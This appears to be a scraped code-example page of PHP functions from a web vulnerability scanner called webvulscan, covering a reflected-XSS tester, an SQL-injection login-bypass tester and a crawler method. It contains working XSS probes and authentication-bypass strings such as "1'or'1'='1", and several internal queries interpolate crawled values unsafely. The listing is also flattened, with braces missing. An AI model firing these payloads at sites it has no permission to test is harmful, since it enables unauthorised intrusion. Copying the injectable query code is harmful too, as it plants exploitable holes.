function testForReflectedXSS($urlToCheck, $urlOfSite, $testId)
    updateStatus($db, "Testing {$urlToCheck} for Reflected Cross-Site Scripting...", $testId);
    $log = new Logger();
    $log->lwrite("Starting Reflected XXS test function on {$urlToCheck}");
    $postUrl = $urlToCheck;
    $postUrlPath = parse_url($postUrl, PHP_URL_PATH);
    //Check URL is not responding with 5xx codes
    $log->lwrite("Checking what response code is received from {$urlToCheck}");
    $http = new http_class();
    $http->timeout = 0;
    $http->data_timeout = 0;
    $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
    $http->follow_redirect = 1;
    $http->redirection_limit = 5;
    $error = $http->GetRequestArguments($urlToCheck, $arguments);
    $error = $http->Open($arguments);
    $log->lwrite("URL to be requested is: {$urlToCheck}");
    if ($error == "") {
        $log->lwrite("Sending HTTP request to {$urlToCheck}");
        $error = $http->SendRequest($arguments);
        if ($error == "") {
            $headers = array();
            $error = $http->ReadReplyHeaders($headers);
            if ($error == "") {
                $responseCode = $http->response_status;
                //This is a string
                $log->lwrite("Received response code: {$responseCode}");
                if (intval($responseCode) >= 500 && intval($responseCode) < 600) {
                    $log->lwrite("Response code: {$responseCode} received from: {$urlToCheck}");
    if (strlen($error)) {
        echo "<H2 align=\"center\">Error: ", $error, "</H2>\n";
        $log->lwrite("Error: {$error}");
    $html = file_get_html($postUrl, $testId);
    if (empty($html)) {
        //This can happen due to file_get_contents returning a 500 code. Then the parser won't parse it
        $log->lwrite("Problem getting contents from {$urlToCheck}");
    //Submit these
    //If adding string to this array, add a corresponding string (to look for in response), with he same index, in the array below
    //The response to look for can be the same as the payload or different.
    $payloads = array('<webvulscan>', 'javascript:alert(webvulscan)');
    //Look for these in response after submitting corresponding payload
    $harmfulResponses = array('<webvulscan>', 'src="javascript:alert(webvulscan)"');
    //First check does the URL passed into this function contain parameters and submit payloads as those parameters if it does
    $parsedUrl = parse_url($urlToCheck);
    $log->lwrite("Check if {$urlToCheck} contains parameters");
    if ($parsedUrl) {
        if (isset($parsedUrl['query'])) {
            $log->lwrite("{$urlToCheck} does contain parameters");
            $scheme = $parsedUrl['scheme'];
            $host = $parsedUrl['host'];
            $path = $parsedUrl['path'];
            $query = $parsedUrl['query'];
            parse_str($query, $parameters);
            $originalQuery = $query;
            $payloadIndex = 0;
            foreach ($payloads as $currentPayload) {
                $http = new http_class();
                $http->timeout = 0;
                $http->data_timeout = 0;
                $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
                $http->follow_redirect = 1;
                $http->redirection_limit = 5;
                foreach ($parameters as $para) {
                    $query = $originalQuery;
                    $newQuery = str_replace($para, $currentPayload, $query);
                    $query = $newQuery;
                    $testUrl = $scheme . '://' . $host . $path . '?' . $query;
                    $log->lwrite("URL to be requested is: {$testUrl}");
                    $error = $http->GetRequestArguments($testUrl, $arguments);
                    $error = $http->Open($arguments);
                    echo "<br>Sending HTTP request to " . htmlspecialchars($testUrl) . "<br>";
                    if ($error == "") {
                        $log->lwrite("Sending HTTP request to {$testUrl}");
                        $error = $http->SendRequest($arguments);
                        if ($error == "") {
                            $headers = array();
                            $error = $http->ReadReplyHeaders($headers);
                            if ($error == "") {
                                $error = $http->ReadWholeReplyBody($body);
                                if (strlen($error) == 0) {
                                    $indicatorStr = $harmfulResponses[$payloadIndex];
                                    if (stripos($body, $indicatorStr)) {
                                        echo '<br>Reflected XSS Present!<br>Query: ' . HtmlSpecialChars($urlToCheck) . '<br>';
                                        echo 'Method: GET <br>';
                                        echo 'Url: ' . HtmlSpecialChars($testUrl) . '<br>';
                                        echo 'Error: ' . htmlspecialchars($indicatorStr) . '<br>';
                                        $tableName = 'test' . $testId;
                                        //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB.
                                        $sql = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'rxss' AND method = 'get' AND url = '{$testUrl}' AND attack_str = '" . addslashes($query) . "'";
                                        $result = $db->query($sql);
                                        if (!$result) {
                                            $log->lwrite("Could not execute query {$sql}");
                                        } else {
                                            $log->lwrite("Successfully executed query {$sql}");
                                            $numRows = $result->num_rows;
                                            if ($numRows == 0) {
                                                $log->lwrite("Number of rows is {$numRows} for query: {$sql}");
                                                insertTestResult($db, $testId, 'rxss', 'get', $testUrl, addslashes($query));
                                        break 2;
                    if (strlen($error)) {
                        echo "<H2 align=\"center\">Error: ", $error, "</H2>\n";
    } else {
        $log->lwrite("Could not parse malformed URL: {$urlToCheck}");
    //Array containing all form objects found
    $arrayOfForms = array();
    //Array containing all input fields
    $arrayOfInputFields = array();
    $log->lwrite("Searching {$postUrl} for forms");
    $formNum = 1;
    //Must use an integer to identify form as forms could have same names and ids
    foreach ($html->find('form') as $form) {
        isset($form->attr['id']) ? $formId = htmlspecialchars($form->attr['id']) : ($formId = '');
        isset($form->attr['name']) ? $formName = htmlspecialchars($form->attr['name']) : ($formName = '');
        isset($form->attr['method']) ? $formMethod = htmlspecialchars($form->attr['method']) : ($formMethod = 'get');
        isset($form->attr['action']) ? $formAction = htmlspecialchars($form->attr['action']) : ($formAction = '');
        $formMethod = strtolower($formMethod);
        //If the action of the form is empty, set the action equal to everything
        //after the URL that the user entered
        if (empty($formAction)) {
            $strLengthUrl = strlen($urlToCheck);
            $strLengthSite = strlen($urlOfSite);
            $firstIndexOfSlash = strpos($urlToCheck, '/', $strLengthSite - 1);
            $formAction = substr($urlToCheck, $firstIndexOfSlash + 1, $strLengthUrl);
        $log->lwrite("Found form on {$postUrl}: {$formId} {$formName} {$formMethod} {$formAction} {$formNum}");
        $newForm = new Form($formId, $formName, $formMethod, $formAction, $formNum);
        array_push($arrayOfForms, $newForm);
        foreach ($form->find('input') as $input) {
            isset($input->attr['id']) ? $inputId = htmlspecialchars($input->attr['id']) : ($inputId = '');
            isset($input->attr['name']) ? $inputName = htmlspecialchars($input->attr['name']) : ($inputName = '');
            isset($input->attr['value']) ? $inputValue = htmlspecialchars($input->attr['value']) : ($inputValue = '');
            isset($input->attr['type']) ? $inputType = htmlspecialchars($input->attr['type']) : ($inputType = '');
            $log->lwrite("Found input field on {$postUrl}: {$inputId} {$inputName} {$formId} {$formName} {$inputValue} {$inputType} {$formNum}");
            $inputField = new InputField($inputId, $inputName, $formId, $formName, $inputValue, $inputType, $formNum);
            array_push($arrayOfInputFields, $inputField);
    //At this stage, we should have captured all forms and their inputs into the corresponding arrays
    $log->lwrite('Beginning testing of forms');
    for ($i = 0; $i < sizeof($arrayOfForms); $i++) {
        $currentForm = $arrayOfForms[$i];
        $currentFormId = $currentForm->getId();
        $currentFormName = $currentForm->getName();
        $currentFormMethod = $currentForm->getMethod();
        $currentFormAction = $currentForm->getAction();
        $currentFormNum = $currentForm->getFormNum();
        $arrayOfCurrentFormsInputs = array();
        $log->lwrite("Beginning testing of form on {$postUrl}: {$currentFormId} {$currentFormName} {$currentFormMethod} {$currentFormAction}");
        for ($j = 0; $j < sizeof($arrayOfInputFields); $j++) {
            $currentInput = $arrayOfInputFields[$j];
            $currentInputIdOfForm = $currentInput->getIdOfForm();
            $currentInputNameOfForm = $currentInput->getNameOfForm();
            $currentInputFormNum = $currentInput->getFormNum();
            //Check if the current input field belongs to the current form and add to array if it does
            if ($currentFormNum == $currentInputFormNum) {
                array_push($arrayOfCurrentFormsInputs, $currentInput);
        $log->lwrite("Beginning testing input fields of form on {$postUrl}: {$currentFormId} {$currentFormName} {$currentFormMethod} {$currentFormAction}");
        for ($k = 0; $k < sizeof($arrayOfCurrentFormsInputs); $k++) {
            for ($plIndex = 0; $plIndex < sizeof($payloads); $plIndex++) {
                $testStr = $payloads[$plIndex];
                $log->lwrite("Submitting payload: {$testStr}");
                $defaultStr = 'Abc123';
                $indicatorStr = $harmfulResponses[$plIndex];
                $currentFormInput = $arrayOfCurrentFormsInputs[$k];
                $currentFormInputName = $currentFormInput->getName();
                $currentFormInputType = $currentFormInput->getType();
                $currentFormInputValue = $currentFormInput->getValue();
                if ($currentFormInputType != 'reset') {
                    $http = new http_class();
                    $http->timeout = 0;
                    $http->data_timeout = 0;
                    $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
                    $http->follow_redirect = 1;
                    $http->redirection_limit = 5;
                    $arrayOfValues = array();
                    //Array of PostOrGetObject objects
                    //Get the other input values and set them equal to the default string
                    $otherInputs = array();
                    for ($l = 0; $l < sizeof($arrayOfCurrentFormsInputs); $l++) {
                        if ($currentFormInput->getName() != $arrayOfCurrentFormsInputs[$l]->getName()) {
                            array_push($otherInputs, $arrayOfCurrentFormsInputs[$l]);
                    $postObject = new PostOrGetObject($currentFormInputName, $testStr);
                    //Add current input and other to array of post values and set their values
                    array_push($arrayOfValues, $postObject);
                    for ($m = 0; $m < sizeof($otherInputs); $m++) {
                        $currentOther = $otherInputs[$m];
                        $currentOtherType = $currentOther->getType();
                        $currentOtherName = $currentOther->getName();
                        $currentOtherValue = $currentOther->getValue();
                        if ($currentOtherType == 'text' || $currentOtherType == 'password') {
                            $postObject = new PostOrGetObject($currentOtherName, $defaultStr);
                            array_push($arrayOfValues, $postObject);
                        } else {
                            if ($currentOtherType == 'checkbox' || $currentOtherType == 'submit') {
                                $postObject = new PostOrGetObject($currentOtherName, $currentOtherValue);
                                array_push($arrayOfValues, $postObject);
                            } else {
                                if ($currentOtherType == 'radio') {
                                    $postObject = new PostOrGetObject($currentOtherName, $currentOtherValue);
                                    //Check if a radio button in the radio group has already been added
                                    $found = false;
                                    for ($n = 0; $n < sizeof($arrayOfValues); $n++) {
                                        if ($arrayOfValues[$n]->getName() == $postObject->getName()) {
                                            $found = true;
                                    if (!$found) {
                                        array_push($arrayOfValues, $postObject);
                    echo '<br><br>';
                    if ($currentFormMethod == 'get') {
                        //Build query string and submit it at end of URL
                        if ($urlOfSite[strlen($urlOfSite) - 1] == '/') {
                            $actionUrl = $urlOfSite . $currentFormAction;
                        } else {
                            $actionUrl = $urlOfSite . '/' . $currentFormAction;
                        $totalTestStr = '';
                        //Compile a test string to show the user how the vulnerability was tested for
                        for ($p = 0; $p < sizeof($arrayOfValues); $p++) {
                            $currentPostValue = $arrayOfValues[$p];
                            $currentPostValueName = $currentPostValue->getName();
                            $currentPostValueValue = $currentPostValue->getValue();
                            $totalTestStr .= $currentPostValueName;
                            $totalTestStr .= '=';
                            $totalTestStr .= $currentPostValueValue;
                            if ($p != sizeof($arrayOfValues) - 1) {
                                $totalTestStr .= '&';
                        if (strpos($actionUrl, '?') !== false) {
                            //url may something like domain.com?id=111 so don't want to add another question mark if it is
                            $actionUrl .= '&';
                        } else {
                            $actionUrl .= '?';
                        $actionUrl .= $totalTestStr;
                        $error = $http->GetRequestArguments($actionUrl, $arguments);
                        $error = $http->Open($arguments);
                        if ($error == "") {
                            $error = $http->SendRequest($arguments);
                            if ($error == "") {
                                $headers = array();
                                $error = $http->ReadReplyHeaders($headers);
                                if ($error == "") {
                                    $error = $http->ReadWholeReplyBody($body);
                                    if (strlen($error) == 0) {
                                        if (stripos($body, $indicatorStr)) {
                                            //If the body that was returned from the request contains the payload, the
                                            //Reflected XSS vulnerabiltiy is present
                                            $totalTestStr = '';
                                            //Compile a test string to show the user how the vulnerability was tested for
                                            for ($p = 0; $p < sizeof($arrayOfValues); $p++) {
                                                $currentPostValue = $arrayOfValues[$p];
                                                $currentPostValueName = $currentPostValue->getName();
                                                $currentPostValueValue = $currentPostValue->getValue();
                                                $totalTestStr .= $currentPostValueName;
                                                $totalTestStr .= '=';
                                                $totalTestStr .= $currentPostValueValue;
                                                if ($p != sizeof($arrayOfValues) - 1) {
                                                    $totalTestStr .= '&';
                                            //The echo's are for testing/debugging the function on its own
                                            echo 'Reflected XSS Present!<br>Query: ' . HtmlSpecialChars($totalTestStr) . '<br>';
                                            echo 'Method: ' . $currentFormMethod . '<br>';
                                            echo 'Url: ' . HtmlSpecialChars($actionUrl) . '';
                                            $tableName = 'test' . $testId;
                                            //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB.
                                            $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'rxss' AND method = '{$currentFormMethod}' AND url = '{$actionUrl}' AND attack_str = '{$totalTestStr}'";
                                            $result = $db->query($query);
                                            if (!$result) {
                                                $log->lwrite("Could not execute query {$query}");
                                            } else {
                                                $log->lwrite("Successfully executed query {$query}");
                                                $numRows = $result->num_rows;
                                                if ($numRows == 0) {
                                                    $log->lwrite("Number of rows is {$numRows} for query: {$query}");
                                                    insertTestResult($db, $testId, 'rxss', $currentFormMethod, $actionUrl, $totalTestStr);
                        if (strlen($error)) {
                            echo "<H2 align=\"center\">Error: ", $error, "</H2>\n";
                    } else {
                        if ($currentFormMethod == 'post') {
                            //Start sending requests with the values in the post values array
                            //Build query string and submit it at end of URL
                            if ($urlOfSite[strlen($urlOfSite) - 1] == '/') {
                                $actionUrl = $urlOfSite . $currentFormAction;
                            } else {
                                $actionUrl = $urlOfSite . '/' . $currentFormAction;
                            $error = $http->GetRequestArguments($actionUrl, $arguments);
                            $arguments["RequestMethod"] = "POST";
                            $arguments["PostValues"] = array();
                            for ($p = 0; $p < sizeof($arrayOfValues); $p++) {
                                $currentPostValue = $arrayOfValues[$p];
                                $currentPostValueName = $currentPostValue->getName();
                                $currentPostValueValue = $currentPostValue->getValue();
                                $tempArray = array($currentPostValueName => $currentPostValueValue);
                                $arguments["PostValues"] = array_merge($arguments["PostValues"], $tempArray);
                            $error = $http->Open($arguments);
                            if ($error == "") {
                                $error = $http->SendRequest($arguments);
                                if ($error == "") {
                                    $headers = array();
                                    $error = $http->ReadReplyHeaders($headers);
                                    if ($error == "") {
                                        $error = $http->ReadWholeReplyBody($body);
                                        if (strlen($error) == 0) {
                                            //echo $body;
                                            if (stripos($body, $indicatorStr)) {
                                                //If the body that was returned from the request contains the test string, the
                                                //Reflected XSS vulnerabiltiy is present
                                                $totalTestStr = '';
                                                //Compile a test string to show the user how the vulnerability was tested for
                                                for ($p = 0; $p < sizeof($arrayOfValues); $p++) {
                                                    $currentPostValue = $arrayOfValues[$p];
                                                    $currentPostValueName = $currentPostValue->getName();
                                                    $currentPostValueValue = $currentPostValue->getValue();
                                                    $totalTestStr .= $currentPostValueName;
                                                    $totalTestStr .= '=';
                                                    $totalTestStr .= $currentPostValueValue;
                                                    if ($p != sizeof($arrayOfValues) - 1) {
                                                        $totalTestStr .= '&';
                                                //The echo's are for testing/debugging the function on its own
                                                echo 'Reflected XSS Present!<br>Query: ' . HtmlSpecialChars($totalTestStr) . '<br>';
                                                echo 'Method: ' . $currentFormMethod . '<br>';
                                                echo 'Url: ' . HtmlSpecialChars($actionUrl) . '';
                                                $tableName = 'test' . $testId;
                                                //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB.
                                                $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'rxss' AND method = '{$currentFormMethod}' AND url = '{$actionUrl}' AND attack_str = '{$totalTestStr}'";
                                                $result = $db->query($query);
                                                if (!$result) {
                                                    $log->lwrite("Could not execute query {$query}");
                                                } else {
                                                    $log->lwrite("Successfully executed query {$query}");
                                                    $numRows = $result->num_rows;
                                                    if ($numRows == 0) {
                                                        $log->lwrite("Number of rows is {$numRows} for query: {$query}");
                                                        insertTestResult($db, $testId, 'rxss', $currentFormMethod, $actionUrl, $totalTestStr);
                            if (strlen($error)) {
                                echo "<H2 align=\"center\">Error: ", $error, "</H2>\n";
コード例 #25
function testAuthenticationSQLi($urlToCheck, $urlOfSite, $testId)
    updateStatus($db, "Testing {$urlToCheck} for Broken Authentication using SQL Injection...", $testId);
    $log = new Logger();
    $log->lwrite("Starting Broken Authentication SQLi test function on {$urlToCheck}");
    $postUrl = $urlToCheck;
    $postUrlPath = parse_url($postUrl, PHP_URL_PATH);
    //Check URL is not responding with 5xx codes
    $log->lwrite("Checking what response code is received from {$urlToCheck}");
    $http = new http_class();
    $http->timeout = 0;
    $http->data_timeout = 0;
    $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
    $http->follow_redirect = 1;
    $http->redirection_limit = 5;
    $error = $http->GetRequestArguments($urlToCheck, $arguments);
    $error = $http->Open($arguments);
    $log->lwrite("URL to be requested is: {$urlToCheck}");
    if ($error == "") {
        $log->lwrite("Sending HTTP request to {$urlToCheck}");
        $error = $http->SendRequest($arguments);
        if ($error == "") {
            $headers = array();
            $error = $http->ReadReplyHeaders($headers);
            if ($error == "") {
                $responseCode = $http->response_status;
                //This is a string
                $log->lwrite("Received response code: {$responseCode}");
                if (intval($responseCode) >= 500 && intval($responseCode) < 600) {
                    $log->lwrite("Response code: {$responseCode} received from: {$urlToCheck}");
    if (strlen($error)) {
        echo "<H2 align=\"center\">Error: ", $error, "</H2>\n";
        $log->lwrite("Error: {$error}");
    $html = file_get_html($postUrl, $testId);
    if (empty($html)) {
        //This can happen due to file_get_contents returning a 500 code. Then the parser won't parse it
        updateStatus($db, "Problem getting contents from {$urlToCheck}...", $testId);
        $log->lwrite("Problem getting contents from {$urlToCheck}");
    //Array containing all form objects found
    $arrayOfForms = array();
    //Array containing all input fields
    $arrayOfInputFields = array();
    $log->lwrite("Searching {$postUrl} for forms");
    $formNum = 1;
    //Must use an integer to identify form as forms could have same names and ids
    foreach ($html->find('form') as $form) {
        isset($form->attr['id']) ? $formId = htmlspecialchars($form->attr['id']) : ($formId = '');
        isset($form->attr['name']) ? $formName = htmlspecialchars($form->attr['name']) : ($formName = '');
        isset($form->attr['method']) ? $formMethod = htmlspecialchars($form->attr['method']) : ($formMethod = 'get');
        isset($form->attr['action']) ? $formAction = htmlspecialchars($form->attr['action']) : ($formAction = '');
        $formMethod = strtolower($formMethod);
        //If the action of the form is empty, set the action equal to everything
        //after the URL that the user entered
        if (empty($formAction)) {
            $strLengthUrl = strlen($urlToCheck);
            $strLengthSite = strlen($urlOfSite);
            $firstIndexOfSlash = strpos($urlToCheck, '/', $strLengthSite - 1);
            $formAction = substr($urlToCheck, $firstIndexOfSlash + 1, $strLengthUrl);
        $log->lwrite("Found form on {$postUrl}: {$formId} {$formName} {$formMethod} {$formAction} {$formNum}");
        $newForm = new Form($formId, $formName, $formMethod, $formAction, $formNum);
        array_push($arrayOfForms, $newForm);
        foreach ($form->find('input') as $input) {
            isset($input->attr['id']) ? $inputId = htmlspecialchars($input->attr['id']) : ($inputId = '');
            isset($input->attr['name']) ? $inputName = htmlspecialchars($input->attr['name']) : ($inputName = '');
            isset($input->attr['value']) ? $inputValue = htmlspecialchars($input->attr['value']) : ($inputValue = '');
            isset($input->attr['type']) ? $inputType = htmlspecialchars($input->attr['type']) : ($inputType = '');
            $log->lwrite("Found input field on {$postUrl}: {$inputId} {$inputName} {$formId} {$formName} {$inputValue} {$inputType} {$formNum}");
            $inputField = new InputField($inputId, $inputName, $formId, $formName, $inputValue, $inputType, $formNum);
            array_push($arrayOfInputFields, $inputField);
    //At this stage, we should have captured all forms and their input fields into the appropriate arrays
    //Begin testing each of the forms
    //Defintion of all payloads used and warnings to examine for
    //Payloads can be added to this
    $arrayOfPayloads = array("1'or'1'='1", "1'or'1'='1';#");
    //Check if the URL passed into this function displays the same webpage at different intervals
    //If it does then attempt to login and if this URL displays a different page, the vulnerability is present
    //e.g. a login page would always look different when you are and are not logged in
    $log->lwrite("Checking if {$urlToCheck} displays the same page at different intervals");
    $responseBodies = array();
    $http = new http_class();
    $http->timeout = 0;
    $http->data_timeout = 0;
    $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
    $http->follow_redirect = 1;
    $http->redirection_limit = 5;
    for ($a = 0; $a < 3; $a++) {
        $error = $http->GetRequestArguments($urlToCheck, $arguments);
        $error = $http->Open($arguments);
        if ($error == "") {
            $number = $a + 1;
            $log->lwrite("Sending HTTP request number {$number} to {$urlToCheck}");
            $error = $http->SendRequest($arguments);
            if ($error == "") {
                $headers = array();
                $error = $http->ReadReplyHeaders($headers);
                if ($error == "") {
                    $error = $http->ReadWholeReplyBody($body);
                    if (strlen($error) == 0) {
                        array_push($responseBodies, $body);
        if (strlen($error)) {
            echo "<H2 align=\"center\">Error: a= {$a} ", $error, "</H2>\n";
    $pageChanges = true;
    $bodyOfUrl = "";
    if ($responseBodies[0] == $responseBodies[1] && $responseBodies[1] == $responseBodies[2]) {
        $bodyOfUrl = $responseBodies[0];
        $pageChanges = false;
    $log->lwrite('Beginning testing of forms');
    for ($i = 0; $i < sizeof($arrayOfForms); $i++) {
        $currentForm = $arrayOfForms[$i];
        $currentFormId = $currentForm->getId();
        $currentFormName = $currentForm->getName();
        $currentFormMethod = $currentForm->getMethod();
        $currentFormAction = $currentForm->getAction();
        $currentFormNum = $currentForm->getFormNum();
        $arrayOfCurrentFormsInputs = array();
        $log->lwrite("Beginning testing of form on {$postUrl}: {$currentFormId} {$currentFormName} {$currentFormMethod} {$currentFormAction}");
        for ($j = 0; $j < sizeof($arrayOfInputFields); $j++) {
            $currentInput = $arrayOfInputFields[$j];
            $currentInputIdOfForm = $currentInput->getIdOfForm();
            $currentInputNameOfForm = $currentInput->getNameOfForm();
            $currentInputFormNum = $currentInput->getFormNum();
            if ($currentFormNum == $currentInputFormNum) {
                array_push($arrayOfCurrentFormsInputs, $currentInput);
        $log->lwrite("Beginning testing input fields of form on {$postUrl}: {$currentFormId} {$currentFormName} {$currentFormMethod} {$currentFormAction}");
        foreach ($arrayOfPayloads as $currentPayload) {
            echo '<br>Size of current form inputs = ' . sizeof($arrayOfCurrentFormsInputs) . '<br>';
            $arrayOfValues = array();
            //Array of PostOrGetObject objects
            for ($k = 0; $k < sizeof($arrayOfCurrentFormsInputs); $k++) {
                $currentFormInput = $arrayOfCurrentFormsInputs[$k];
                $currentFormInputName = $currentFormInput->getName();
                $currentFormInputType = $currentFormInput->getType();
                $currentFormInputValue = $currentFormInput->getValue();
                if ($currentFormInputType != 'reset') {
                    $log->lwrite("Using payload: {$currentPayload}, to all input fields of form w/ action: {$currentFormAction}");
                    //Add current input and other inputs to array of post values and set their values
                    if ($currentFormInputType == 'text' || $currentFormInputType == 'password') {
                        $postObject = new PostOrGetObject($currentFormInputName, $currentPayload);
                        array_push($arrayOfValues, $postObject);
                    } else {
                        if ($currentFormInputType == 'checkbox' || $currentFormInputType == 'submit') {
                            $postObject = new PostOrGetObject($currentFormInputName, $currentFormInputValue);
                            array_push($arrayOfValues, $postObject);
                        } else {
                            if ($currentFormInputType == 'radio') {
                                $postObject = new PostOrGetObject($currentFormInputName, $currentFormInputValue);
                                //Check if a radio button in the radio group has already been added
                                $found = false;
                                for ($n = 0; $n < sizeof($arrayOfValues); $n++) {
                                    if ($arrayOfValues[$n]->getName() == $postObject->getName()) {
                                        $found = true;
                                if (!$found) {
                                    array_push($arrayOfValues, $postObject);
            if ($currentFormMethod == 'get') {
                //Build query string and submit it at end of URL
                if ($urlOfSite[strlen($urlOfSite) - 1] == '/') {
                    $actionUrl = $urlOfSite . $currentFormAction;
                } else {
                    $actionUrl = $urlOfSite . '/' . $currentFormAction;
                $totalTestStr = '';
                //Make a string to show the user how the vulnerability was tested for i.e. the data submitted to exploit the vulnerability
                for ($p = 0; $p < sizeof($arrayOfValues); $p++) {
                    $currentPostValue = $arrayOfValues[$p];
                    $currentPostValueName = $currentPostValue->getName();
                    $currentPostValueValue = $currentPostValue->getValue();
                    $totalTestStr .= $currentPostValueName;
                    $totalTestStr .= '=';
                    $totalTestStr .= $currentPostValueValue;
                    if ($p != sizeof($arrayOfValues) - 1) {
                        $totalTestStr .= '&';
                $actionUrl .= '?';
                $actionUrl .= $totalTestStr;
                $error = $http->GetRequestArguments($actionUrl, $arguments);
                $error = $http->Open($arguments);
                $log->lwrite("URL to be requested is: {$actionUrl}");
                if ($error == "") {
                    $log->lwrite("Sending HTTP request to {$actionUrl}");
                    $error = $http->SendRequest($arguments);
                    if ($error == "") {
                        $headers = array();
                        $error = $http->ReadReplyHeaders($headers);
                        if ($error == "") {
                            $error = $http->ReadWholeReplyBody($body);
                            if (strlen($error) == 0) {
                                $vulnerabilityFound = checkIfVulnerabilityFound($urlToCheck, $pageChanges, $bodyOfUrl, $log, $currentPayload, $http);
                                if ($vulnerabilityFound) {
                                    $totalTestStr = '';
                                    //Make a test string to show the user how the vulnerability was tested for
                                    for ($p = 0; $p < sizeof($arrayOfValues); $p++) {
                                        $currentPostValue = $arrayOfValues[$p];
                                        $currentPostValueName = $currentPostValue->getName();
                                        $currentPostValueValue = $currentPostValue->getValue();
                                        $totalTestStr .= $currentPostValueName;
                                        $totalTestStr .= '=';
                                        $totalTestStr .= $currentPostValueValue;
                                        if ($p != sizeof($arrayOfValues) - 1) {
                                            $totalTestStr .= '&';
                                    //The echo's below are for testing the function on its own i.e. requesting this script with your browser
                                    echo 'Broken Authentication Present!<br>Query: ' . HtmlSpecialChars($totalTestStr) . '<br>';
                                    echo 'Method: ' . $currentFormMethod . '<br>';
                                    echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>';
                                    echo 'Error: Successfully Logged In with SQL injection';
                                    $tableName = 'test' . $testId;
                                    //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB.
                                    $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'basqli' AND method = '{$currentFormMethod}' AND url = '" . addslashes($actionUrl) . "' AND attack_str = '" . addslashes($totalTestStr) . "'";
                                    $result = $db->query($query);
                                    if (!$result) {
                                        $log->lwrite("Could not execute query {$query}");
                                    } else {
                                        $log->lwrite("Successfully executed query {$query}");
                                        $numRows = $result->num_rows;
                                        if ($numRows == 0) {
                                            $log->lwrite("Number of rows is {$numRows} for query: {$query}");
                                            insertTestResult($db, $testId, 'basqli', $currentFormMethod, addslashes($actionUrl), addslashes($totalTestStr));
                if (strlen($error)) {
                    echo "<H2 align=\"center\">Error: ", $error, "</H2>\n";
                    echo 'Method: ' . $currentFormMethod . '<br>';
                    echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>';
            } else {
                if ($currentFormMethod == 'post') {
                    //Build query string and submit it at end of URL
                    if ($urlOfSite[strlen($urlOfSite) - 1] == '/') {
                        $actionUrl = $urlOfSite . $currentFormAction;
                    } else {
                        $actionUrl = $urlOfSite . '/' . $currentFormAction;
                    $error = $http->GetRequestArguments($actionUrl, $arguments);
                    $arguments["RequestMethod"] = "POST";
                    $arguments["PostValues"] = array();
                    for ($p = 0; $p < sizeof($arrayOfValues); $p++) {
                        $currentPostValue = $arrayOfValues[$p];
                        $currentPostValueName = $currentPostValue->getName();
                        $currentPostValueValue = $currentPostValue->getValue();
                        $tempArray = array($currentPostValueName => $currentPostValueValue);
                        $arguments["PostValues"] = array_merge($arguments["PostValues"], $tempArray);
                    $error = $http->Open($arguments);
                    $log->lwrite("URL to be requested is: {$actionUrl}");
                    if ($error == "") {
                        $log->lwrite("Sending HTTP request to {$actionUrl}");
                        $error = $http->SendRequest($arguments);
                        if ($error == "") {
                            $headers = array();
                            $error = $http->ReadReplyHeaders($headers);
                            if ($error == "") {
                                $error = $http->ReadWholeReplyBody($body);
                                if (strlen($error) == 0) {
                                    $vulnerabilityFound = checkIfVulnerabilityFound($urlToCheck, $pageChanges, $bodyOfUrl, $log, $currentPayload, $http);
                                    if ($vulnerabilityFound) {
                                        $totalTestStr = '';
                                        //Compile a test string to show the user how the vulnerability was tested for
                                        for ($p = 0; $p < sizeof($arrayOfValues); $p++) {
                                            $currentPostValue = $arrayOfValues[$p];
                                            $currentPostValueName = $currentPostValue->getName();
                                            $currentPostValueValue = $currentPostValue->getValue();
                                            $totalTestStr .= $currentPostValueName;
                                            $totalTestStr .= '=';
                                            $totalTestStr .= $currentPostValueValue;
                                            if ($p != sizeof($arrayOfValues) - 1) {
                                                $totalTestStr .= '&';
                                        //The echo's below are for testing the function on its own i.e. requesting this script with your browser
                                        echo 'Broken Authentication Present!<br>Query: ' . HtmlSpecialChars($totalTestStr) . '<br>';
                                        echo 'Method: ' . $currentFormMethod . '<br>';
                                        echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>';
                                        echo 'Error: Successfully Logged In with SQL injection';
                                        $tableName = 'test' . $testId;
                                        //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB.
                                        $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'basqli' AND method = '{$currentFormMethod}' AND url = '" . addslashes($actionUrl) . "' AND attack_str = '" . addslashes($totalTestStr) . "'";
                                        $result = $db->query($query);
                                        if (!$result) {
                                            $log->lwrite("Could not execute query {$query}");
                                        } else {
                                            $log->lwrite("Successfully executed query {$query}");
                                            $numRows = $result->num_rows;
                                            if ($numRows == 0) {
                                                $log->lwrite("Number of rows is {$numRows} for query: {$query}");
                                                insertTestResult($db, $testId, 'basqli', $currentFormMethod, addslashes($actionUrl), addslashes($totalTestStr));
                    if (strlen($error)) {
                        echo "<H2 align=\"center\">Error: ", $error, "</H2>\n";
                        echo 'Method: ' . $currentFormMethod . '<br>';
                        echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>';
コード例 #26
ファイル: phpcrawler.class.php プロジェクト: 3nj0y/webvulscan
 function go()
     $starting_time = $this->getmicrotime();
     // Init, split given URL into host, port, path and file a.s.o.
     $url_parts = PHPCrawlerUtils::splitURL($this->url_to_crawl);
     // Set base-host and base-path "global" for this class,
     // we need it very often (i guess at this point...)
     $this->base_path = $url_parts["path"];
     $this->base_host = $url_parts["host"];
     $this->base_domain = $url_parts["domain"];
     // If the base port wasnt set by the user ->
     // take the one from the given start-URL.
     if ($this->base_port == "") {
         $this->base_port = $url_parts["port"];
     // if the base-port WAS set by the user
     $url_parts["port"] = $this->base_port;
     // Reset the base_url
     $this->url_to_crawl = PHPCrawlerUtils::rebuildURL($url_parts);
